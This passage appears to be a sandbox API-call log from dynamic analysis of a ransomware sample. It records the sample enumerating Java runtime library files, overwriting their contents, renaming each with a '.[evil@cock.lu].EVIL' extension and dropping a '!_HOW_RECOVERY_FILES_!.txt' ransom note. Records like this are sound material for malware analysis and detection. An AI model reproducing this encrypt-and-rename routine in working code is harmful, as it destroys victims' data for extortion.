Files\\Java\\jre1.8.0_131\\lib\\management\\snmp.acl.template.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\snmp.acl.template.[evil@cock.lu].evil")) returned 1 [0097.805] ??_V@YAXPEAX@Z () returned 0x1 [0097.808] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\snmp.acl.template", dwFileAttributes=0x0) returned 0 [0097.808] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0097.808] FindClose (in: hFindFile=0x84b11dde60 | out: hFindFile=0x84b11dde60) returned 1 [0097.808] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management") returned 0x32 [0097.808] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0097.808] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0097.808] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.808] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0097.808] __uncaught_exception () returned 0x84b1160800 [0097.808] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.809] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.809] wcsstr (_Str="management-agent.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.809] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management-agent.jar") returned 60 [0097.809] wcscmp (_String1="management-agent.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.809] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="management-agent.jar") returned 0x0 [0097.809] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management-agent.jar") returned 0x3c [0097.809] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management-agent.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management-agent.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.811] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x17d, lpOverlapped=0x0) returned 1 [0097.813] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.813] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.813] _errno () returned 0x84b1160840 [0097.813] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.814] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x180, lpOverlapped=0x0) returned 1 [0097.814] CloseHandle (hObject=0x1a4) returned 1 [0097.814] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management-agent.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.814] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.814] __uncaught_exception () returned 0x84b1160800 [0097.814] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.823] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management-agent.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management-agent.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management-agent.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management-agent.jar.[evil@cock.lu].evil")) returned 1 [0097.824] ??_V@YAXPEAX@Z () returned 0x1 [0097.826] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\management-agent.jar", dwFileAttributes=0x0) returned 0 [0097.827] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.827] wcsstr (_Str="meta-index", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.827] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\meta-index") returned 50 [0097.827] wcscmp (_String1="meta-index", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.827] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="meta-index") returned 0x0 [0097.827] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\meta-index") returned 0x32 [0097.827] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\meta-index"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.829] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x84e, lpOverlapped=0x0) returned 1 [0097.832] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.832] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.832] _errno () returned 0x84b1160840 [0097.832] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.832] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x860, lpOverlapped=0x0) returned 1 [0097.832] CloseHandle (hObject=0x1a4) returned 1 [0097.833] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\meta-index", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.833] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.833] __uncaught_exception () returned 0x84b1160800 [0097.833] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.833] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\meta-index"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\meta-index.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\meta-index.[evil@cock.lu].evil")) returned 1 [0097.834] ??_V@YAXPEAX@Z () returned 0x1 [0097.837] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\meta-index", dwFileAttributes=0x0) returned 0 [0097.837] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.837] wcsstr (_Str="net.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.837] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\net.properties") returned 54 [0097.837] wcscmp (_String1="net.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.837] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="net.properties") returned 0x0 [0097.838] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\net.properties") returned 0x36 [0097.838] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\net.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\net.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.840] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x1170, lpOverlapped=0x0) returned 1 [0097.843] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.843] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.843] _errno () returned 0x84b1160840 [0097.843] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.843] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x1180, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x1180, lpOverlapped=0x0) returned 1 [0097.843] CloseHandle (hObject=0x1a4) returned 1 [0097.843] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\net.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.843] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.843] __uncaught_exception () returned 0x84b1160800 [0097.844] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.844] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\net.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\net.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\net.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\net.properties.[evil@cock.lu].evil")) returned 1 [0097.844] ??_V@YAXPEAX@Z () returned 0x1 [0097.848] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\net.properties", dwFileAttributes=0x0) returned 0 [0097.848] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.848] wcsstr (_Str="plugin.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.848] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\plugin.jar") returned 50 [0097.848] wcscmp (_String1="plugin.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.848] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="plugin.jar") returned 0x0 [0097.848] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\plugin.jar") returned 0x32 [0097.848] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\plugin.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\plugin.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.850] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0097.911] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.911] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.911] _errno () returned 0x84b1160840 [0097.913] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.913] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0097.941] CloseHandle (hObject=0x1a4) returned 1 [0097.941] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\plugin.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.942] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.942] __uncaught_exception () returned 0x84b1160800 [0097.942] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.942] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\plugin.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\plugin.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\plugin.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\plugin.jar.[evil@cock.lu].evil")) returned 1 [0097.942] ??_V@YAXPEAX@Z () returned 0x1 [0097.945] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\plugin.jar", dwFileAttributes=0x0) returned 0 [0097.945] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.945] wcsstr (_Str="psfont.properties.ja", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.945] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\psfont.properties.ja") returned 60 [0097.945] wcscmp (_String1="psfont.properties.ja", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.945] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="psfont.properties.ja") returned 0x0 [0097.945] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\psfont.properties.ja") returned 0x3c [0097.945] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\psfont.properties.ja" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\psfont.properties.ja"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.947] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xaec, lpOverlapped=0x0) returned 1 [0097.950] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.950] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.950] _errno () returned 0x84b1160840 [0097.950] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.950] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xb00, lpOverlapped=0x0) returned 1 [0097.950] CloseHandle (hObject=0x1a4) returned 1 [0097.950] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\psfont.properties.ja", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.950] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.950] __uncaught_exception () returned 0x84b1160800 [0097.950] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.950] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\psfont.properties.ja" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\psfont.properties.ja"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\psfont.properties.ja.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\psfont.properties.ja.[evil@cock.lu].evil")) returned 1 [0097.951] ??_V@YAXPEAX@Z () returned 0x1 [0097.954] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\psfont.properties.ja", dwFileAttributes=0x0) returned 0 [0097.954] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.954] wcsstr (_Str="psfontj2d.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.954] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\psfontj2d.properties") returned 60 [0097.954] wcscmp (_String1="psfontj2d.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.954] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="psfontj2d.properties") returned 0x0 [0097.954] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\psfontj2d.properties") returned 0x3c [0097.954] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\psfontj2d.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\psfontj2d.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.957] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x2899, lpOverlapped=0x0) returned 1 [0097.960] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.960] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.960] _errno () returned 0x84b1160840 [0097.960] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.960] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x28a0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x28a0, lpOverlapped=0x0) returned 1 [0097.960] CloseHandle (hObject=0x1a4) returned 1 [0097.960] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\psfontj2d.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.960] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.960] __uncaught_exception () returned 0x84b1160800 [0097.960] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.960] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\psfontj2d.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\psfontj2d.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\psfontj2d.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\psfontj2d.properties.[evil@cock.lu].evil")) returned 1 [0097.961] ??_V@YAXPEAX@Z () returned 0x1 [0097.964] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\psfontj2d.properties", dwFileAttributes=0x0) returned 0 [0097.965] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.965] wcsstr (_Str="resources.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.965] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\resources.jar") returned 53 [0097.965] wcscmp (_String1="resources.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.965] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="resources.jar") returned 0x0 [0097.965] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\resources.jar") returned 0x35 [0097.965] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\resources.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.967] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0098.042] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.042] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.042] _errno () returned 0x84b1160840 [0098.044] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.044] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0098.057] CloseHandle (hObject=0x1a4) returned 1 [0098.057] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\resources.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.057] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.057] __uncaught_exception () returned 0x84b1160800 [0098.057] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.068] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\resources.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\resources.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\resources.jar.[evil@cock.lu].evil")) returned 1 [0098.068] ??_V@YAXPEAX@Z () returned 0x1 [0098.071] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\resources.jar", dwFileAttributes=0x0) returned 0 [0098.071] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0098.071] wcsstr (_Str="rt.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.071] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\rt.jar") returned 46 [0098.071] wcscmp (_String1="rt.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.071] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="rt.jar") returned 0x0 [0098.071] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\rt.jar") returned 0x2e [0098.071] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\rt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0098.073] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0098.164] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.164] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.165] _errno () returned 0x84b1160840 [0098.166] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.166] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0098.193] CloseHandle (hObject=0x1a4) returned 1 [0098.193] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\rt.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.194] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.194] __uncaught_exception () returned 0x84b1160800 [0098.194] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.226] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\rt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\rt.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\rt.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\rt.jar.[evil@cock.lu].evil")) returned 1 [0098.227] ??_V@YAXPEAX@Z () returned 0x1 [0098.230] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\rt.jar", dwFileAttributes=0x0) returned 0 [0098.231] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0098.231] wcsstr (_Str="security", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.231] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security") returned 48 [0098.231] wcscmp (_String1=".", _String2="security") returned -1 [0098.231] wcscmp (_String1="..", _String2="security") returned -1 [0098.231] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security") returned 0x30 [0098.231] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, 